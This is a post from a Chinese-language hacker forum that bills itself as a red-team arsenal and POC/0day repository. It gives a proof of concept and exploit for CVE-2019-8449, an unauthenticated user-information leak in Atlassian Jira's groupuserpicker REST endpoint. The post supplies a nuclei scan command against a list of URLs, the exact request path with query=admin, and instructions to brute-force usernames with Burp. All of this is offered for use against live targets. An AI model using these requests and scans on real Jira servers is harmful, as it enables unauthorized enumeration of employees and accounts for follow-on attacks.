黑客仓库

最全面知识的黑客论坛，全网最强大的漏洞数据聚合仓库丨黑客网站丨黑客论坛丨暗网丨红队武器库丨渗透测试丨POC/0day/Nday/1day丨网络安全丨黑客攻击丨服务器安全防御丨渗透测试入门丨网络技术交流丨蓝队丨护网丨红队丨欢迎来到黑客仓库，您可以在我们的论坛板块进行交流和学习。

立即注册账号！

POC Jira 信息泄漏（CVE-2019-8449）

主题发起人 Shacker
开始时间 09 13, 2024

Shacker

黑客倉庫站長

贡献: 21%

09 13, 2024

JavaScript:

## 漏洞概述

Atlassian Jira 8.4.0之前版本`/rest/api/latest/groupuserpicker`接口允许未授权查询员工信息，攻击者可以通过爆破用户名名单等方法获取用户信息

## 影响范围 

```http
7.12< Jira < 8.4.0
```

## POC

```bash
nuclei -tags jira -t /cves -l urls.txt
```

## EXP

```bash
/rest/api/latest/groupuserpicker?query=admin
#返回的json中没有数据的话admin不存在，有用户相关数据则admin用户存在
#然后直接用Burp爆破用户即可
```

POC Jira

POC Jira管理平台

点击展开...

好评 0 否决票

您必须登录或注册才可回复。

	POC Jira 未授权SSRF（CVE-2019-8451） Shacker 09 13, 2024 POC/?Day漏洞数据
	POC SA-CORE-2019-003 RCE (CVE-2019-6340) Shacker 09 12, 2024 POC/?Day漏洞数据
	POC Jira Shacker 09 13, 2024 POC/?Day漏洞数据
	POC Jira管理平台 Shacker 09 13, 2024 POC/?Day漏洞数据
	POC Shiro 550反序列化(CVE-2016-4437)包含EXP Shacker 09 10, 2024 POC/?Day漏洞数据

本站需要使用 Cookie。如果您继续使用本站，则表示同意我们使用 Cookie。

接受了解更多。...

后退

顶部

黑客仓库

POC Jira 信息泄漏（CVE-2019-8449）

论坛统计

新会员

在线会员

关于我们